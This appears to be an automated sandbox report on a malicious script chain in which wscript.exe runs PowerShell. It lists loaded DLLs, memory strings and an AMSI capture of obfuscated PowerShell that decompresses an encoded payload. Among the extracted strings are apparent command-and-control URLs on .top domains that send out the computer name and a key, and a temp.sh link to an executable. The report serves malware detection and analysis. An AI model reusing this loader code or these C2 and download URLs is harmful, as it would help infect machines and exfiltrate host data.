Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbZC source: powershell.exe, 00000002.00000002.1801780109.000001B34662A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\System.pdbI source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\System.pdb)f source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\System.pdbpdbtem.pdb source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000002.00000002.1755950559.000001B32C35D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: *n.pdb source: powershell.exe, 00000002.00000002.1756422832.000001B32DD91000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: m.pdb-g source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.pdb source: powershell.exe, 00000002.00000002.1755950559.000001B32C35D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1801780109.000001B34662A000.00000004.00000020.00020000.00000000.sdmp |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$m1o7nzq3c4ray05/$lytnxfpbkhsum2w.php?id=$env:computername&key=$mceotxshykj&s=mints1 |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://isyzgez.top |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://isyzgez.top/1.php?s=mints1 |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F719000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mknjddllgakhaje.top |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F719000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mknjddllgakhaje.top/oie6bu9wr5htr.php?id=user-PC&key=43650517590&s=mints1 |
Source: powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32DE71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32FBAF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://temp.sh |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.1800811353.000001B346500000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.c9t |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32DE71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32FB37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://temp.sh |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F9E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1756548460.000001B32F9D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://temp.sh/bfseS/ruzxs.exe |
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $eg6f5dmnzj0lbip.(([system.String]::new(@((8087-(67640680/(9188-(-4793+5547)))),(5997-5886),(10201-(4658+5431)),(-4512+(13879-(33091434/(8000-4421)))),(2038-1954),(909312/8192)))))( $4b7iqngl0fm3zt1 ) $eg6f5dmnzj0lbip.(([char[]]@((3528-3461),(8217-(59487624/7336)),(6501-(-2090+8480)),(4119-(13728-9724)),(-8905+9006)) -join ''))()$fu4ironpzhmjw2l.(([system.String]::new(@((216142/(8581160/(-3545+(53859400/(4076+4604))))),(499500/4625),(61827/557),(-2276+(-6344+8735)),(6194-(55757043/(66619280/7280)))))))()[byte[]] $f9woybdmlgz7nvr = $4b7iqngl0fm3zt1.((-join (@((664608/(847+(11904525/1685))),(-8954+9065),(503685/(14036-(14041-7754))),(-4671+4785),(639882/5613),(59267/(4002050/(1329+5221))),(568337/4697))| ForEach-Object { [char]$_ })))() $nha63b49uvzd1mt=$f9woybdmlgz7nvr return $nha63b49uvzd1mt}[System.Text.Encoding]::ascii.(([system.String]::new(@((124676/(-4260+(4704512/(-4489+(14854-9583))))),(410565/(-4545+(9172-(9630-9068)))),(303-187),(807258/(56887374/(11683-(29630886/(-613+(35910828/(-2159+8468))))))),(576636/(14293-(49173550/(20113575/(4938-(5916375/(3110+(256+(-295+2188))))))))),(556548/4882),(871080/8296),(797940/7254),(157178/1526)))))((3gb87m6det9axhcu5nfkjyiz02o "af9rbmhiZmQ2eJqsLRt/ORql+Ufyp1ZQXs9QhwWX3zsecG5QQe/Egmq74VgqPndhVT/1KqKGjoL5D/jfKdPkzExQ9FODdWwiEc6Y8juX2TBng5wLKa28GdcdGJrCnM4Hjf80YXddnJqVi4B/aKi+0bX92F4ORQgLS0tYgrd8iLtPhPR/0TutsVQYkJDTo+A/wIvdUaSdl5Z9nxhuyE6PQZYcXl2OwuvtraoT3xO5CSut5GtMjakUEbQMJSrsVRa1q2vVHSdHKFnlsFhyuYgauHeZOKcmJOQvwaC5sgqRmt6ITCCXSZmyC4/1C6icLmDqZB9vVRbyHY5BnsSKFIFG2g05G4PdyLPm/EpQ+fq5Mg6bhJG0bjc7JGLnuaFksovVOS4sEv1NIhkRiqv+W46sAN/7GVxNAoHJi5sUcUSu3b55J4HuzaqEA+Hb3aSlAJOq7FsNj/oL0deVjIkECGDYmdm21hBtlXFDW00ttYDhqfU9tJbJSBmEivL5DBBMBIj2nCg6BIY4AUtupxqdIBkxppQkXQ1p7mW+S1vSt3atW6D7w+/FnSI4897c3/DUlqTtScE7iczfArWTtPZbIQ4Jr9/HYTOcV0gLCMGejR7BAQTjxgAvHD5o8YTU+HhI4IGZYho2PZzOBYXDQEnr8ZAZDHMo/SbDjrLgg3F18dE+z9UjeBuED48hxkmux9xUGdVsnVhEVi3vQeogWdZT/sqF1LyMoFfCCcGkhV3uBU59hbhBsoyBl8HTr1aTDxoq8K6pm4LeBgMwjsGmvRWicwQEgTHllcgHAVn3b8GLG8GTcZWmO5lJH925Lc2mWz1mmk25Ptz+iz+ZAousIMT9Qdo1lyhPooRq3Zxqk0xROFFLKAj7/foRQF7so2rBe/49VLu4lMbcApYQGJVdX5B/kMtekgkdHLzOxIYgi5qNEQccg75tpY5MhYATlAwZkRTDEojLj99YkZyR4e2P4cAPGMJZ1vCF8gboNWyS3s07FEiyvoSuK9Yc4aJq1rWg4dnVe1t8IAy6J5rHrhZgD5sBXjHq2E0kQ3TtmADcTV+U5We/mOCf5/4KyL3FaXUchLDxOsdkmGyZPBWMMV/Pk9HXzVstmY/l0fN9pgrLFw6jLe8wOoKyExdjmkh+EaU5BOxN/zmi5kRYUymP+xuuuBaLz3BYrZP54XPJ61DHQcu93EfUDVPvQQDnP75v4qTTZDihDvJSX |